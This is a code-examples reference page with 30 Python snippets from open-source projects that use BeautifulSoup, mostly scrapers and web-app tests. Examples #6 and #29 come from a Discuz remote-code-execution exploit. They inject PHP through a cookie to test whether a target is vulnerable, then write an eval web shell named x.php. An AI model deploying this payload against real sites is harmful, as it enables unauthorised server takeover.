Python bs4.BeautifulSoup() Examples

The following are 30 code examples of bs4.BeautifulSoup(). You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may also want to check out all available functions/classes of the module bs4 , or try the search function .
Example #1
Source File: start.py    From Starx_Pixiv_Collector with MIT License 10 votes vote down vote up
def get_pixiv_user_name():
    global login_status
    tag = 'Get_Pixiv_User_Name'
    # Check if cookies works.
    pixiv_www_url = 'https://www.pixiv.net/'
    check_soup = BeautifulSoup(get_text_from_url(pixiv_www_url), 'html.parser')
    try:
        pixiv_user_nick_name = check_soup.find(name='a', attrs={'class': 'user-name js-click-trackable-later'}).string
        print_with_tag(tag, ['Login as', pixiv_user_nick_name])
    except Exception as e:
        print_with_tag(tag,['Error:',e])
        login_status = False
        print_with_tag(tag,'Failed to check the user name.')
        print_with_tag(tag,'Might be the cookies is out of the date?')
    else:
        login_status = True
        print_with_tag(tag,'Login success!')

# 
Example #2
Source File: gitgot.py    From GitGot with GNU Lesser General Public License v3.0 7 votes vote down vote up
def gist_fetch(query, page_idx, total_items=1000):
    gist_url = "https://gist.github.com/search?utf8=%E2%9C%93&q={}&p={}"
    query = urllib.parse.quote(query)
    gists = []

    try:
        resp = requests.get(gist_url.format(query, page_idx))
        soup = bs4.BeautifulSoup(resp.text, 'html.parser')
        total_items = min(total_items, int(
            [x.text.split()[0] for x in soup.find_all('h3')
                if "gist results" in x.text][0].replace(',', '')))
        gists = [x.get("href") for x in soup.findAll(
                            "a", class_="link-overlay")]
    except IndexError:
        return {"data": None, "total_items": 0}

    return {"data": gists, "total_items": total_items} 
Example #3
Source File: universal.py    From xalpha with MIT License 7 votes vote down vote up
def get_rt_from_ft(code, _type="indices"):
    url = make_ft_url(code, _type=_type)
    r = rget(url)
    b = BeautifulSoup(r.text, "lxml")
    d = {}
    d["name"] = b.find("h1").string
    d["current"] = _float(b.find("span", class_="mod-ui-data-list__value").string)
    d["percent"] = _float(
        b.select("span[class^='mod-format--']")[0].text.split("/")[-1].strip()[:-1]
    )
    d["current_ext"] = None
    d["market"] = None
    d["currency"] = b.find("span", class_="mod-ui-data-list__label").string.split("(")[
        1
    ][:-1]
    d["time"] = b.find("div", class_="mod-disclaimer").string
    return d 
Example #4
Source File: misc.py    From xalpha with MIT License 7 votes vote down vote up
def get_tdx_holidays(holidays=None, format="%Y-%m-%d"):
    r = rget("https://www.tdx.com.cn/url/holiday/")
    r.encoding = "gbk"
    b = BeautifulSoup(r.text, "lxml")
    l = b.find("textarea").string.split("\n")
    if not holidays:
        holidays = {}
    for item in l:
        if item.strip():
            c = item.split("|")
            if c[2] in region_trans:
                rg = region_trans[c[2]]
                tobj = dt.datetime.strptime(c[0], "%Y%m%d")
                tstr = tobj.strftime(format)
                if rg not in holidays:
                    holidays[rg] = [tstr]
                else:
                    holidays[rg].append(tstr)
    return holidays 
Example #5
Source File: test_exceptions_handler.py    From sanic with MIT License 7 votes vote down vote up
def test_chained_exception_handler():
    request, response = exception_handler_app.test_client.get(
        "/6/0", debug=True
    )
    assert response.status == 500

    soup = BeautifulSoup(response.body, "html.parser")
    html = str(soup)

    assert "response = handler(request, *args, **kwargs)" in html
    assert "handler_6" in html
    assert "foo = 1 / arg" in html
    assert "ValueError" in html
    assert "The above exception was the direct cause" in html

    summary_text = " ".join(soup.select(".summary")[0].text.split())
    assert (
        "ZeroDivisionError: division by zero while handling path /6/0"
    ) == summary_text 
Example #6
Source File: dz-ml-rce.py    From discuz-ml-rce with MIT License 7 votes vote down vote up
def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout):

    tgtUrl = tgtUrl
    check_payload = setcookie_language_value + '\'.phpinfo().\';'
    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
    headers["Cookie"] = check_payload;

    check_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
    #print headers['Cookie']
    if check_rsp.status_code == 200:
        try:
            if (check_rsp.text.index('PHP Version')):
                print 'target is vulnerable!!!'

            else:
                soup = BeautifulSoup(check_rsp.text, 'lxml')
                if (soup.find('title')):
                    print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n'
        except ValueError, e:
                print 'target seem not vulnerable-' + e.__repr__()
        except: 
Example #7
Source File: test_admin_forms.py    From comport with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def test_edit_and_preview_links_on_schema_preview_page(self, testapp):
        department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        for page in ['complaints', 'useofforce', 'ois', 'assaultsonofficers']:

            response = testapp.get("/department/{}/preview/schema/{}".format(department.id, page))
            assert response.status_code == 200
            soup = BeautifulSoup(response.text, "html.parser")
            assert soup.find("a", href="/department/{}/edit/schema/{}".format(department.id, page)) is not None
            assert soup.find("a", href="/department/{}".format(department.id)) is not None 
Example #8
Source File: start.py    From Starx_Pixiv_Collector with MIT License 6 votes vote down vote up
def get_illust_infos_from_illust_url(url):
    data_dict = {}
    illust_url_content = get_text_from_url(url)
    # illust_url_content.encoding = 'unicode_escape'
    new_soup = BeautifulSoup(illust_url_content,'html.parser')
    json_data = new_soup.find(name='meta',attrs={'name':'preload-data'}).attrs['content']
    format_json_data = demjson.decode(json_data)
    pre_catch_id = list(format_json_data['illust'].keys())[0]
    illust_info = format_json_data['illust'][pre_catch_id]
    # get each value
    data_dict['illustId'] = illust_info['illustId']
    data_dict['illustTitle'] = illust_info['illustTitle']
    data_dict['illustComment'] = illust_info['illustComment']
    data_dict['createDate'] = illust_info['createDate']
    data_dict['illustType'] = illust_info['illustType']
    data_dict['urls'] = illust_info['urls']
    # data_dict['tags']=illust_info['tags']
    data_dict['userId'] = illust_info['userId']
    data_dict['userName'] = illust_info['userName']
    data_dict['userAccount'] = illust_info['userAccount']
    data_dict['likeData'] = illust_info['likeData']
    data_dict['width'] = illust_info['width']
    data_dict['height'] = illust_info['height']
    data_dict['pageCount'] = illust_info['pageCount']
    data_dict['bookmarkCount'] = illust_info['bookmarkCount']
    data_dict['likeCount'] = illust_info['likeCount']
    data_dict['commentCount'] = illust_info['commentCount']
    data_dict['viewCount'] = illust_info['viewCount']
    data_dict['isOriginal'] = illust_info['isOriginal']
    per_tags = illust_info['tags']['tags']
    tags_list = []
    for tag in range(len(per_tags)):
        tags_list.append(per_tags[tag]['tag'])
    data_dict['tags'] = tags_list
    ###########################################################
    update_database(data_dict['illustId'], data_dict['illustTitle'], data_dict['illustType'], data_dict['userId'],
                    data_dict['userName'], data_dict['tags'], data_dict['urls'])
    return data_dict 
Example #9
Source File: ebay-watcher.py    From ebay-watcher with MIT License 6 votes vote down vote up
def watch(self):
        '''
        () -> None
        Attempts to watch a product on eBay.
        '''
        # Get product watch link
        try:
            r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
        except:
            try:
                r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
            except:
                log('e', "Connection failed while loading product on " + self.product_link)
                return

        try:
            watch_link = soup(r.text, "html.parser").find("div", {"id": "vi-atl-lnk"}).a["href"]
        except:
            log('e', "Connection failed while loading product on " + self.product_link)
            return
            
        # Watch the product (the second GET actually adds it to watch list)
        try:
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)   
        except:
            try:
                r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
                r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)   
            except:
                log('e', "Failed to add " + self.product_link + " to watch list.")
                return
                

        # Alert user of progress: Watch product success/failure
        if("saved in your" in r.text.lower()):
            log('s', "Added " + self.product_link + " to watch list.")
        else:
            log('e', "Couldn't add " + self.product_link + " to watch list.") 
Example #10
Source File: google.py    From fireprox with GNU General Public License v3.0 6 votes vote down vote up
def check_query(count, url, query):
	if url[-1] == '/':
		url = url[:-1]

	url = f'{url}/search?q={query}&start={count}&num=100'
	headers = {
		'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
	}
	results = requests.get(url, headers=headers)

	soup = BeautifulSoup(results.text, 'lxml')

	with add_lock:
		idx = 1
		for g in soup.find_all('div', class_='r'):
			link = g.find_all('a')[0]['href']
			title = g.find_all('h3')[0]
			item = f'{title.text} ({link})'
			search_results.add(item)
			idx+=1 
Example #11
Source File: bing.py    From fireprox with GNU General Public License v3.0 6 votes vote down vote up
def check_query(count, url, query):
	if url[-1] == '/':
		url = url[:-1]

	url = f'{url}/search?q={query}&first={count}'
	headers = {
		'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
	}
	results = requests.get(url, headers=headers)

	soup = BeautifulSoup(results.text, 'lxml')

	with add_lock:
		idx = 1
		for g in soup.find_all('li', class_='b_algo'):
			result = g.find('h2')
			link = result.find('a')['href']
			title = result.text
			item = f'{title} ({link})'
			search_results.add(item)
			idx+=1 
Example #12
Source File: test_admin_forms.py    From comport with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def test_edit_and_preview_links_on_department_admin_page(sefl, testapp):
        ''' There are links to preview & edit main and schema pages from the department admin page.
        '''
        department = Department.create(name="B Police Department", short_name="BPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        response = testapp.get("/department/{}".format(department.id))
        assert response.status_code == 200
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="{}/preview/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/assaultsonofficers".format(department.id)) is not None 
Example #13
Source File: universal.py    From xalpha with MIT License 6 votes vote down vote up
def get_portfolio_fromttjj(code, start=None, end=None):
    startobj = dt.datetime.strptime(start, "%Y%m%d")
    endobj = dt.datetime.strptime(end, "%Y%m%d")
    if (endobj - startobj).days < 90:
        return None  # note start is always 1.1 4.1 7.1 10.1 in incremental updates
    if code.startswith("F"):
        code = code[1:]
    r = rget("http://fundf10.eastmoney.com/zcpz_{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    table = s.find("table", class_="tzxq")
    df = pd.read_html(str(table))[0]
    df["date"] = pd.to_datetime(df["报告期"])
    df["stock_ratio"] = df["股票占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["bond_ratio"] = df["债券占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["cash_ratio"] = df["现金占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    #     df["dr_ratio"] = df["存托凭证占净比"].replace("---", "0%").apply(lambda s: xa.cons._float(s[:-1]))
    df["assets"] = df["净资产(亿元)"]
    df = df[::-1]
    return df[["date", "stock_ratio", "bond_ratio", "cash_ratio", "assets"]]


# this is the most elegant approach to dispatch get_daily, the definition can be such simple
# you actually don't need to bother on start end blah, everything is taken care of by ``cahcedio`` 
Example #14
Source File: test_admin_forms.py    From comport with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def test_edit_and_preview_links_on_preview_page(self, testapp):
        department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        for page in ['index', 'complaints', 'useofforce', 'ois', 'assaultsonofficers']:

            response = testapp.get("/department/{}/preview/{}".format(department.id, page))
            assert response.status_code == 200
            soup = BeautifulSoup(response.text, "html.parser")
            assert soup.find("a", href="/department/{}/edit/{}".format(department.id, page)) is not None
            assert soup.find("a", href="/department/{}".format(department.id)) is not None 
Example #15
Source File: Extractor.py    From News-At-Command-Line with MIT License 6 votes vote down vote up
def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="content__article-body from-content-api js-article__body")
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            for foundcontent in content.find_all("p"):
                Result.append(foundcontent.text)
        Result=''.join(Result)
        return (title,Result) 
Example #16
Source File: Extractor.py    From News-At-Command-Line with MIT License 6 votes vote down vote up
def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="article")
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image","span"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            for foundcontent in content.find_all("p"):
                Result.append(foundcontent.text)
        Result=''.join(Result)
        return (title,Result) 
Example #17
Source File: Extractor.py    From News-At-Command-Line with MIT License 6 votes vote down vote up
def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="Normal")
        #print maincontent
        for content in maincontent:
            #print content.text
            Result.append(content.text)
        Result=''.join(Result)
        return (title,Result) 
Example #18
Source File: views.py    From MPContribs with MIT License 6 votes vote down vote up
def export_notebook(nb, cid):
    nb = nbformat.from_dict(nb)
    html_exporter = HTMLExporter()
    html_exporter.template_file = "basic"
    body = html_exporter.from_notebook_node(nb)[0]
    soup = BeautifulSoup(body, "html.parser")
    # mark cells with special name for toggling, and
    # TODO make element id's unique by appending cid (for ingester)
    for div in soup.find_all("div", "output_wrapper"):
        script = div.find("script")
        if script:
            script = script.contents[0]
            if script.startswith("render_json"):
                div["name"] = "HData"
            elif script.startswith("render_table"):
                div["name"] = "Tables"
            elif script.startswith("render_plot"):
                div["name"] = "Graphs"
        else:
            pre = div.find("pre")
            if pre and pre.contents[0].startswith("Structure"):
                div["name"] = "Structures"
    # name divs for toggling code_cells
    for div in soup.find_all("div", "input"):
        div["name"] = "Code"
    # separate script
    script = []
    for s in soup.find_all("script"):
        script.append(s.string)
        s.extract()  # remove javascript
    return soup.prettify(), "\n".join(script) 
Example #19
Source File: Extractor.py    From News-At-Command-Line with MIT License 6 votes vote down vote up
def TextExtractionAlgo(self,text,htmlelement,classname):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all(htmlelement, class_=classname)
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            Result.append(content.text)
        Result=''.join(Result)
        return (title,Result) 
Example #20
Source File: test_public_pages.py    From comport with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def test_about_page_exists(self, testapp):
        response = testapp.get("/about/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="https://www.codeforamerica.org") is not None 
Example #21
Source File: test_public_pages.py    From comport with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def test_non_public_depts_display_for_users_with_access(self, testapp):
        ''' Users can see links to datasets they're allowed to access on the front page
        '''
        impd = Department.create(name="I Police Department", short_name="IMPD", is_public=True)
        UseOfForceIncidentIMPD.create(department_id=impd.id, opaque_id="12345abcde")
        bpd = Department.create(name="B Police Department", short_name="BPD", is_public=False)
        UseOfForceIncidentBPD.create(department_id=bpd.id, opaque_id="12345abcde")
        lmpd = Department.create(name="LM Police Department", short_name="LMPD", is_public=False)
        UseOfForceIncidentLMPD.create(department_id=lmpd.id, opaque_id="12345abcde")

        # A non logged-in user can only see the public department
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

        # A user associated with a particular department can see that department's
        # available datasets when logged in
        create_and_log_in_user(testapp=testapp, department=bpd, username="user1")
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is not None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

        # A user with admin access can see all departments' available datasets
        create_and_log_in_user(testapp=testapp, department=impd, rolename='admin', username="user2")
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is not None
        assert soup.find("a", href="/department/LMPD/useofforce") is not None

        # Log out and only the public department should be visible
        testapp.get(url_for('public.logout')).follow()
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is None
        assert soup.find("a", href="/department/LMPD/useofforce") is None 
Example #22
Source File: misc.py    From xalpha with MIT License 6 votes vote down vote up
def get_ri_status(suburl=None):
    if not suburl:
        suburl = "m=cb&a=cb_all"  # 可转债

    url = "http://www.richvest.com/index.php?"
    url += suburl
    r = rget(url, headers={"user-agent": "Mozilla/5.0"})
    b = BeautifulSoup(r.text, "lxml")
    cl = []
    for c in b.findAll("th"):
        cl.append(c.text)
    nocl = len(cl)
    rl = []
    for i, c in enumerate(b.findAll("td")):
        if i % nocl == 0:
            r = []
        r.append(c.text)
        if i % nocl == nocl - 1:
            rl.append(r)
    return pd.DataFrame(rl, columns=cl) 
Example #23
Source File: proxyLoader.py    From premeStock with MIT License 6 votes vote down vote up
def filterConnections(proxiesList):
	workingProxies = []
	count = 0
	for proxy in proxiesList:
		count += 1
		cprint("Loading proxy # {}".format(count), "green")
		proxies = {
		  'http': proxy,
		  'https': proxy
		}
		try:
			r = requests.get("http://www.supremenewyork.com/shop/all", proxies=proxies, timeout=1)
			data = r.text
			soup = BeautifulSoup(data,"html.parser")
			headerCheck = str(soup.find("span",{"id":"time-zone-name"}).text)
			if headerCheck == "NYC":
				cprint(headerCheck, "blue")
				workingProxies.append(proxy)
				cprint("Added {}!".format(proxy),"green")
			else:
				cprint("Banned!", "red")
				raise
		except:
			cprint("Bad Proxy: {}".format(proxy), "red")
	return workingProxies 
Example #24
Source File: proxyLoader.py    From premeStock with MIT License 6 votes vote down vote up
def site2(proxiesList):
	url = "https://www.us-proxy.org/"
	user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
	r = requests.get(url,headers=user)

	data = r.text
	soup = BeautifulSoup(data,"html.parser")

	table = soup.find("tbody")
	for ips in table.find_all("tr"):
		count = 0
		proxy = ""
		for ip in ips.find_all("td"):
			if count == 0:
				proxy = str(ip.text)
				proxy += ":"
			if count == 1:
				proxy += str(ip.text)
				proxiesList.append(proxy)
				break;
			count += 1
	cprint("Succesfully added {} proxies!".format(len(proxiesList)), 'green') 
Example #25
Source File: universal.py    From xalpha with MIT License 6 votes vote down vote up
def get_newest_netvalue(code):
    """
    防止天天基金总量 API 最新净值更新不及时,获取基金最新公布净值及对应日期, depracated, use get_rt("F501018") instead

    :param code: six digits string for fund.
    :return: netvalue, %Y-%m-%d
    """
    code = code[1:]
    r = rget("http://fund.eastmoney.com/{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    return (
        float(
            s.findAll("dd", class_="dataNums")[1]
            .find("span", class_="ui-font-large")
            .string
        ),
        str(s.findAll("dt")[1]).split("(")[1].split(")")[0][7:],
    ) 
Example #26
Source File: proxyLoader.py    From premeStock with MIT License 6 votes vote down vote up
def site4(proxiesList):
	url = "https://www.proxynova.com/proxy-server-list/country-us/"
	user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
	
	r = requests.get(url,headers=user)
	data = r.text
	soup = BeautifulSoup(data,"html.parser")

	proxy = ""
	# for ips in soup.find_all("tr",{"class":"spy1xx"}):
	for ips in soup.find_all("tr"):
		count = 0
		for ip in ips.find_all("td",{"align":"left"}):
			if count == 0:
				proxy = str(ip.get_text(strip=True).replace("document.write('","").replace("'","").replace("+","").replace(");","").replace(" ",""))
			if count == 1:
				proxy += ":"+str(ip.text).strip()
				proxiesList.append(proxy)
				break;
			count += 1 
Example #27
Source File: Self.py    From CyberTK-Self with GNU General Public License v2.0 6 votes vote down vote up
def yt(query):
    with requests.session() as s:
         isi = []
         if query == "":
             query = "S1B tanysyz"   
         s.headers['user-agent'] = 'Mozilla/5.0'
         url    = 'http://www.youtube.com/results'
         params = {'search_query': query}
         r    = s.get(url, params=params)
         soup = BeautifulSoup(r.content, 'html5lib')
         for a in soup.select('.yt-lockup-title > a[title]'):
            if '&list=' not in a['href']:
                if 'watch?v' in a['href']:
                    b = a['href'].replace('watch?v=', '')
                    isi += ['youtu.be' + b]
         return isi 
Example #28
Source File: test_public_pages.py    From comport with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def test_home_page_links_to_about(self, testapp):
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/about/") is not None 
Example #29
Source File: dz-ml-rce.py    From discuz-ml-rce with MIT License 5 votes vote down vote up
def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout):
    getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
    getshell_exp_send = setcookie_language_value + getshell_exp

    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";

    headers['Cookie'] = getshell_exp_send

    filename = tgtUrl.split('/')[-1]

    getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
    # print headers['Cookie']
    if getshell_rsp.status_code == 200:
        getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
        #print tgtUrl.split('/')[-1]
        #print tgtUrl.split(filename)[0] + 'x.php'
        if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""):
            print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
        else:
            #soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
            print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100]

    else:
        print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n' 
Example #30
Source File: get_recipes.py    From recipe-box with MIT License 5 votes vote down vote up
def get_all_recipes_epi(page_num):
    base_url = 'http://www.epicurious.com'
    search_url_str = 'search/?content=recipe&page'
    url = '{}/{}={}'.format(base_url, search_url_str, page_num)

    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item')
        recipe_links = [r['href'] for r in recipe_link_items]
        return {base_url + r: get_recipe(base_url + r) for r in recipe_links}
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []